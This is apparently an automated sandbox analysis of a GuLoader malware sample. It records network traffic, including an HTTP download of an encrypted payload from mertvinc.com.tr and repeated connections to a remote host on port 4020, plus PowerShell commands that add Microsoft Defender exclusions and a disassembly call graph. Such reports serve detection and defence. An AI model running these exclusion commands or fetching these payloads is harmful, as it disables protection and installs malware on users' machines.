                                                                    Nov 24, 2024 16:37:41.543121099 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.543133974 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.543145895 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.543205023 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.543299913 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.543319941 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.543332100 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.543353081 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.543353081 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.543387890 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.543387890 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.543498039 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.545491934 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.669895887 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.669949055 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.670222998 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.672571898 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.672663927 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.672687054 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.672795057 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.680847883 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.681524038 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.744287014 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.744311094 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.744411945 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.744411945 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.748864889 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.748959064 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.749116898 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.756894112 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.756989956 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.757055044 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.765439034 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.765546083 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.765557051 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.765666962 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.773710012 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.773799896 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.773947954 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.782145977 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.782253981 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.782363892 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.790452003 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.790582895 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.790606022 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.790628910 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.798891068 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.798973083 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.799132109 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.799336910 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.807224035 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.807354927 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.807456970 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:41.815633059 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.817536116 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:52.475794077 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:52.476011038 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:59.956208944 CET498214020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:00.076695919 CET40204982187.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:38:00.077451944 CET498214020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:00.186928034 CET498214020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:00.316099882 CET40204982187.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:38:12.671473026 CET498214020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:12.791150093 CET40204982187.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:38:22.017298937 CET40204982187.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:38:22.017369032 CET498214020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:25.184211969 CET498214020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:25.185985088 CET498784020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:25.303945065 CET40204982187.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:38:25.305512905 CET40204987887.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:38:25.305721045 CET498784020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:25.329801083 CET498784020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:25.449522018 CET40204987887.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:38:36.481672049 CET498784020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:36.607101917 CET40204987887.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:38:47.106221914 CET498784020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:47.225748062 CET40204987887.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:38:47.292992115 CET40204987887.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:38:47.293200016 CET498784020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:48.356179953 CET498784020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:48.357084036 CET499304020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:48.475850105 CET40204987887.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:38:48.476629019 CET40204993087.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:38:48.476697922 CET499304020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:48.504985094 CET499304020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:38:48.624479055 CET40204993087.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:39:00.187432051 CET499304020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:39:00.308686018 CET40204993087.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:39:04.590574026 CET499304020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:39:04.710504055 CET40204993087.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:39:10.434034109 CET40204993087.121.86.8192.168.2.10
                                                                    Nov 24, 2024 16:39:10.434335947 CET499304020192.168.2.1087.121.86.8
                                                                    Nov 24, 2024 16:39:12.653122902 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:39:13.059086084 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:39:13.668637991 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:39:14.871557951 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:39:17.279886961 CET4977680192.168.2.10185.244.144.68

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 24, 2024 16:37:39.888823032 CET5334053192.168.2.101.1.1.1
                                                                    Nov 24, 2024 16:37:40.028912067 CET53533401.1.1.1192.168.2.10

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Nov 24, 2024 16:37:39.888823032 CET192.168.2.101.1.1.10xf9fStandard query (0)mertvinc.com.trA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Nov 24, 2024 16:37:04.649529934 CET1.1.1.1192.168.2.100xc902No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Nov 24, 2024 16:37:04.649529934 CET1.1.1.1192.168.2.100xc902No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                    Nov 24, 2024 16:37:40.028912067 CET1.1.1.1192.168.2.100xf9fNo error (0)mertvinc.com.tr185.244.144.68A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • mertvinc.com.tr

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.1049776185.244.144.68807796C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 24, 2024 16:37:40.158443928 CET186OUTGET /SJatcRCUnkMIpuGcrVu155.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: mertvinc.com.tr
                                                                    Cache-Control: no-cache
                                                                    Nov 24, 2024 16:37:41.542453051 CET297INHTTP/1.1 200 OK
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/octet-stream
                                                                    Last-Modified: Wed, 20 Nov 2024 06:43:56 GMT
                                                                    Etag: "8e40-673d852c-bd5a9871c8854887;;;"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 36416
                                                                    Date: Sun, 24 Nov 2024 14:44:06 GMT
                                                                    Server: LiteSpeed
                                                                    X-Powered-By: PleskLin
                                                                    Nov 24, 2024 16:37:41.543064117 CET1236INData Raw: be 3a c0 b1 ae 40 c7 81 6b 11 2e 77 f6 96 68 e3 0a a1 78 47 6b 84 eb 94 2e b9 4d 18 35 99 e8 db fd 19 0c 14 aa fa 44 7a 05 82 9b 00 34 87 1b e7 4b ae f4 ae 61 40 1e 3f 54 6e 4e 69 54 ae 32 2c 4c b1 81 1e 57 7d 70 3b 73 1b d6 7b 02 44 ae 21 52 af
                                                                    Data Ascii: :@k.whxGk.M5Dz4Ka@?TnNiT2,LW}p;s{D!RMa&raj,mnc7EFqN;c$+CO|AO#c/>O9N3ifU4+K|23kp_Lj.JVoy~1\
                                                                    Nov 24, 2024 16:37:41.543121099 CET1236INData Raw: 80 9f d0 22 0c ff 86 e5 b1 3e ce 61 e1 d0 fa 48 b8 b4 26 67 6a 6e c5 d2 6e ff cb 63 f4 cd 79 ff 45 4e 8b 64 71 0d eb a2 48 09 8f 6e 04 0c 79 c4 86 17 e0 cb d2 a6 70 41 fb d5 7f ef 04 b0 22 cc 09 16 75 2f 24 e9 4d 72 e0 45 75 a6 b1 1e 2c d7 3d 0a
                                                                    Data Ascii: ">aH&gjnncyENdqHnypA"u/$MrEu,=|~4+O9F$8p_}k#VoyCj=}a&d9;*xU@Vs5CI<6w51yxzRClcICi
                                                                    Nov 24, 2024 16:37:41.543133974 CET1236INData Raw: e0 02 b7 86 b5 64 e4 4b ed f6 e1 c7 ff ab 46 bb ca 41 40 f7 c3 06 14 99 c1 03 a7 a3 d8 55 8c b3 5a 6b 86 e1 bd 31 9d ce 39 d9 84 a2 00 1c 3a f6 7e b8 ff ae 22 31 ed ef 24 f7 14 9c 63 bf 1c 15 50 12 77 05 ec e2 e4 8f c1 05 19 63 30 1e d8 51 92 e6
                                                                    Data Ascii: dKFA@UZk19:~"1$cPwc0QRDAuO<MSw5il1j^zus?MIC[LJ0&[zr|XA0AL0K<rm6fU![47O1t={Omb`
                                                                    Nov 24, 2024 16:37:41.543145895 CET492INData Raw: 2d 0d 1e d5 47 54 f3 c8 19 aa 20 7f ed e1 3c 0c bf 82 86 d2 9e b7 e8 2d 63 06 12 31 fd b4 c6 a7 6d 97 5d 88 b2 35 31 b6 52 5e 85 5e 7a 2c 98 9d e2 75 41 5e 49 9c 1a b2 f7 2d f1 19 01 50 99 aa 4c e4 4e 5f c1 11 26 a7 25 90 4f 9f b7 06 98 66 82 d0
                                                                    Data Ascii: -GT <-c1m]51R^^z,uA^I-PLN_&%OfpP@4F s60UF(}1G!%)t9xVUEBm kn'kXv4/r'2rHkSuT)L`sGD97nR:EbFy ZS#<
                                                                    Nov 24, 2024 16:37:41.543205023 CET1236INData Raw: a5 f4 67 8e 3f 71 49 cb ec 7d 7c ae aa f4 37 1a a6 c2 90 8b 6e 1c fd a5 a4 65 83 71 56 10 da 2b 6f 3b 72 1d 7c d3 91 54 a4 e4 20 d9 99 2a 69 36 97 c6 e7 99 b8 58 89 b8 1b 2b 25 8c c2 b7 a1 52 b2 3b 05 0e 97 9e f5 f7 43 3e 0c 8d e3 fc b9 a6 d9 69
                                                                    Data Ascii: g?qI}|7neqV+o;r|T *i6X+%R;C>i@46gi)~GOH.9)Sm&JU3vI0LU%&71.7~gzKH)qW0uPfj8td8cBWphq~FC(#
                                                                    Nov 24, 2024 16:37:41.543299913 CET1236INData Raw: 7d 0e 78 95 44 c5 ab 5c 72 9f 60 4f 4e ae 1b cd 39 e6 a1 8b 29 70 69 20 1c 0d 25 c4 c1 cc 9e 0b b1 b4 0b c1 b9 67 eb 53 6a ee 28 89 e7 ca d3 55 a3 af 00 86 ee 2a 31 2a ad 99 0c ea e8 e3 d2 39 5b dc 53 17 7a 41 c6 ce f2 fa bd 48 37 63 71 e8 e6 14
                                                                    Data Ascii: }xD\r`ON9)pi %gSj(U*1*9[SzAH7cqgU53UPy8tqsmlWzhq~Lh8nfl)X;0#?Bmt L_>U+oRGHl#w6Ua%D+V}4 P%2~`
                                                                    Nov 24, 2024 16:37:41.543319941 CET1236INData Raw: ff b9 1a f8 44 a4 9f 5d 19 ab 16 1f 8c 48 67 ef 3c 74 90 fe 89 75 fe 1d 3b 3a 1f b3 6c c7 67 41 f7 8c 40 81 70 6a b4 70 9a cf bd bb 92 ae 95 f0 38 e5 69 3c 78 2c 8b 22 b7 8e 6e fb 23 f6 77 2b 02 99 f8 03 12 88 c0 fa 89 ba 87 70 54 32 03 74 d3 9e
                                                                    Data Ascii: D]Hg<tu;:lgA@pjp8i<x,"n#w+pT2ts.S#-_J3v/GzY`)_(*|0~F,E31e=?\S*SY\)$Yi$[?]P<;#ALA\${#xzZJ,xj[sddNKcH@l
                                                                    Nov 24, 2024 16:37:41.543332100 CET492INData Raw: 01 d3 17 91 dd ba 37 cd 5f 4e a3 4c 3a f9 2f b9 b6 6f 83 ae 61 c1 c6 47 c3 60 fe da f1 29 5f 93 de b5 ec 2a 06 e7 10 9c 59 7c 6e 6d c2 a1 a4 bc cc 56 56 0d 28 20 2c 25 32 7e df 83 2a 51 3a 0f 52 77 c7 8f ee 23 e3 27 6b 22 08 58 3b fe 0c dd 10 79
                                                                    Data Ascii: 7_NL:/oaG`)_*Y|nmVV( ,%2~*Q:Rw#'k"X;yOZm37YoF_V*L'i*/Z3C|zr#Z_O4_jQX71FC;w|>2y;1&x=IS`mdCcVMc"@]z
                                                                    Nov 24, 2024 16:37:41.543498039 CET1236INData Raw: 35 80 4e 98 79 c3 fe 9c aa 36 af 5a 51 46 18 40 d3 d1 38 46 ce 3d c2 ff 05 3c 0d 01 16 85 62 42 c1 aa 4a 95 7c 90 b7 36 cb 34 6b 68 e5 4e c7 bd 4b 7a 6b ed e4 e9 aa 20 cb 67 a4 e2 f1 91 92 89 4b 01 d7 d0 b6 fd 2b 07 68 64 d5 7b 10 f9 70 3f 8a 63
                                                                    Data Ascii: 5Ny6ZQF@8F=<bBJ|64khNKzk gK+hd{p?cLv`Gx97nR*IFy1r_<$A^NpTPwx-uc;f<}oC[,.]Lj}K;mO<k_{t"+_y*l$z
                                                                    Nov 24, 2024 16:37:41.669895887 CET1236INData Raw: f6 ff 0a cb b2 d5 ca 17 04 bb dc e5 90 48 37 6e 52 bf f3 45 a8 1f 95 28 34 83 e1 cb 4e 9e 01 5a 50 23 3c 88 61 06 8b ae b1 3f 0c ae 69 ac 31 57 a6 90 97 d3 3e a2 9c 28 0e c8 70 db 3f 1e bf f9 f2 a7 5b 18 a5 db 44 78 fd 2d 57 85 6f 13 3d 4d 07 03
                                                                    Data Ascii: H7nRE(4NZP#<a?i1W>(p?[Dx-Wo=Mg#J7,p6F]kL]z' mN+ty*Q+0F`.R2@!j3.D'L8IWWRp(6X/ lrEe1Q


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:10:37:06
                                                                    Start date:24/11/2024
                                                                    Path:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\yVVZdG2NJX.exe"
                                                                    Imagebase:0x400000
                                                                    File size:568'338 bytes
                                                                    MD5 hash:18EA5087EB82E075CA35D2B2DCFF9450
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.1554696495.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1555288349.0000000004473000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:10:37:28
                                                                    Start date:24/11/2024
                                                                    Path:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\yVVZdG2NJX.exe"
                                                                    Imagebase:0x400000
                                                                    File size:568'338 bytes
                                                                    MD5 hash:18EA5087EB82E075CA35D2B2DCFF9450
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:5
                                                                    Start time:10:37:45
                                                                    Start date:24/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe'
                                                                    Imagebase:0xcc0000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:10:37:45
                                                                    Start date:24/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff620390000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:8
                                                                    Start time:10:37:49
                                                                    Start date:24/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yVVZdG2NJX.exe'
                                                                    Imagebase:0xcc0000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:9
                                                                    Start time:10:37:49
                                                                    Start date:24/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff620390000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:10
                                                                    Start time:10:37:52
                                                                    Start date:24/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe'
                                                                    Imagebase:0xcc0000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:11
                                                                    Start time:10:37:52
                                                                    Start date:24/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff620390000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:19.5%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:20.4%
                                                                      Total number of Nodes:1526
                                                                      Total number of Limit Nodes:38
                                                                      execution_graph 5002 703d103d 5005 703d101b 5002->5005 5012 703d1516 5005->5012 5007 703d1020 5008 703d1024 5007->5008 5009 703d1027 GlobalAlloc 5007->5009 5010 703d153d 3 API calls 5008->5010 5009->5008 5011 703d103b 5010->5011 5014 703d151c 5012->5014 5013 703d1522 5013->5007 5014->5013 5015 703d152e GlobalFree 5014->5015 5015->5007 3952 401941 3953 401943 3952->3953 3958 402c41 3953->3958 3959 402c4d 3958->3959 4004 4062b9 3959->4004 3962 401948 3964 4059a9 3962->3964 4046 405c74 3964->4046 3967 4059d1 DeleteFileW 3969 401951 3967->3969 3968 4059e8 3970 405b13 3968->3970 4060 406297 lstrcpynW 3968->4060 3970->3969 4089 4065da FindFirstFileW 3970->4089 3972 405a0e 3973 405a21 3972->3973 3974 405a14 lstrcatW 3972->3974 4061 405bb8 lstrlenW 3973->4061 3975 405a27 3974->3975 3978 405a37 lstrcatW 3975->3978 3979 405a2d 3975->3979 3981 405a42 lstrlenW FindFirstFileW 3978->3981 3979->3978 3979->3981 3983 405b08 3981->3983 3990 405a64 3981->3990 3982 405b31 4092 405b6c lstrlenW CharPrevW 3982->4092 3983->3970 3986 405aeb FindNextFileW 3986->3990 3991 405b01 FindClose 3986->3991 3987 405961 5 API calls 3989 405b43 3987->3989 3992 405b47 3989->3992 3993 405b5d 3989->3993 3990->3986 3997 4059a9 60 API calls 3990->3997 4000 4052ff 24 API calls 3990->4000 4065 406297 lstrcpynW 3990->4065 4066 405961 3990->4066 4074 4052ff 3990->4074 4085 40605d MoveFileExW 3990->4085 3991->3983 3992->3969 3996 4052ff 24 API calls 3992->3996 3995 4052ff 24 API calls 3993->3995 3995->3969 3998 405b54 3996->3998 3997->3990 3999 40605d 36 API calls 3998->3999 4001 405b5b 3999->4001 4000->3986 4001->3969 4019 4062c6 4004->4019 4005 406511 4006 402c6e 4005->4006 4037 406297 lstrcpynW 4005->4037 4006->3962 4021 40652b 4006->4021 4008 4064df lstrlenW 4008->4019 4009 4062b9 10 API calls 4009->4008 4012 4063f4 GetSystemDirectoryW 4012->4019 4014 406407 GetWindowsDirectoryW 4014->4019 4015 40652b 5 API calls 4015->4019 4016 4062b9 10 API calls 4016->4019 4017 406482 lstrcatW 4017->4019 4018 40643b SHGetSpecialFolderLocation 4018->4019 4020 406453 SHGetPathFromIDListW CoTaskMemFree 4018->4020 4019->4005 4019->4008 4019->4009 4019->4012 4019->4014 4019->4015 4019->4016 4019->4017 4019->4018 4030 406165 4019->4030 4035 4061de wsprintfW 4019->4035 4036 406297 lstrcpynW 4019->4036 4020->4019 4027 406538 4021->4027 4022 4065ae 4023 4065b3 CharPrevW 4022->4023 4026 4065d4 4022->4026 4023->4022 4024 4065a1 CharNextW 4024->4022 4024->4027 4026->3962 4027->4022 4027->4024 4028 40658d CharNextW 4027->4028 4029 40659c CharNextW 4027->4029 4042 405b99 4027->4042 4028->4027 4029->4024 4038 406104 4030->4038 4033 4061c9 4033->4019 4034 406199 RegQueryValueExW RegCloseKey 4034->4033 4035->4019 4036->4019 4037->4006 4039 406113 4038->4039 4040 406117 4039->4040 4041 40611c RegOpenKeyExW 4039->4041 4040->4033 4040->4034 4041->4040 4043 405b9f 4042->4043 4044 405bb5 4043->4044 4045 405ba6 CharNextW 4043->4045 4044->4027 4045->4043 4095 406297 lstrcpynW 4046->4095 4048 405c85 4096 405c17 CharNextW CharNextW 4048->4096 4051 4059c9 4051->3967 4051->3968 4052 40652b 5 API calls 4055 405c9b 4052->4055 4053 405ccc lstrlenW 4054 405cd7 4053->4054 4053->4055 4056 405b6c 3 API calls 4054->4056 4055->4051 4055->4053 4057 4065da 2 API calls 4055->4057 4059 405bb8 2 API calls 4055->4059 4058 405cdc GetFileAttributesW 4056->4058 4057->4055 4058->4051 4059->4053 4060->3972 4062 405bc6 4061->4062 4063 405bd8 4062->4063 4064 405bcc CharPrevW 4062->4064 4063->3975 4064->4062 4064->4063 4065->3990 4102 405d68 GetFileAttributesW 4066->4102 4069 40598e 4069->3990 4070 405984 DeleteFileW 4072 40598a 4070->4072 4071 40597c RemoveDirectoryW 4071->4072 4072->4069 4073 40599a SetFileAttributesW 4072->4073 4073->4069 4075 40531a 4074->4075 4084 4053bc 4074->4084 4076 405336 lstrlenW 4075->4076 4077 4062b9 17 API calls 4075->4077 4078 405344 lstrlenW 4076->4078 4079 40535f 4076->4079 4077->4076 4080 405356 lstrcatW 4078->4080 4078->4084 4081 405372 4079->4081 4082 405365 SetWindowTextW 4079->4082 4080->4079 4083 405378 SendMessageW SendMessageW SendMessageW 4081->4083 4081->4084 4082->4081 4083->4084 4084->3990 4086 40607e 4085->4086 4087 406071 4085->4087 4086->3990 4105 405ee3 4087->4105 4090 4065f0 FindClose 4089->4090 4091 405b2d 4089->4091 4090->4091 4091->3969 4091->3982 4093 405b37 4092->4093 4094 405b88 lstrcatW 4092->4094 4093->3987 4094->4093 4095->4048 4097 405c34 4096->4097 4101 405c46 4096->4101 4099 405c41 CharNextW 4097->4099 4097->4101 4098 405c6a 4098->4051 4098->4052 4099->4098 4100 405b99 CharNextW 4100->4101 4101->4098 4101->4100 4103 40596d 4102->4103 4104 405d7a SetFileAttributesW 4102->4104 4103->4069 4103->4070 4103->4071 4104->4103 4106 405f13 4105->4106 4107 405f39 GetShortPathNameW 4105->4107 4132 405d8d GetFileAttributesW CreateFileW 4106->4132 4109 406058 4107->4109 4110 405f4e 4107->4110 4109->4086 4110->4109 4112 405f56 wsprintfA 4110->4112 4111 405f1d CloseHandle GetShortPathNameW 4111->4109 4113 405f31 4111->4113 4114 4062b9 17 API calls 4112->4114 4113->4107 4113->4109 4115 405f7e 4114->4115 4133 405d8d GetFileAttributesW CreateFileW 4115->4133 4117 405f8b 4117->4109 4118 405f9a GetFileSize GlobalAlloc 4117->4118 4119 406051 CloseHandle 4118->4119 4120 405fbc 4118->4120 4119->4109 4134 405e10 ReadFile 4120->4134 4125 405fdb lstrcpyA 4129 405ffd 4125->4129 4126 405fef 4127 405cf2 4 API calls 4126->4127 4127->4129 4128 406034 SetFilePointer 4141 405e3f WriteFile 4128->4141 4129->4128 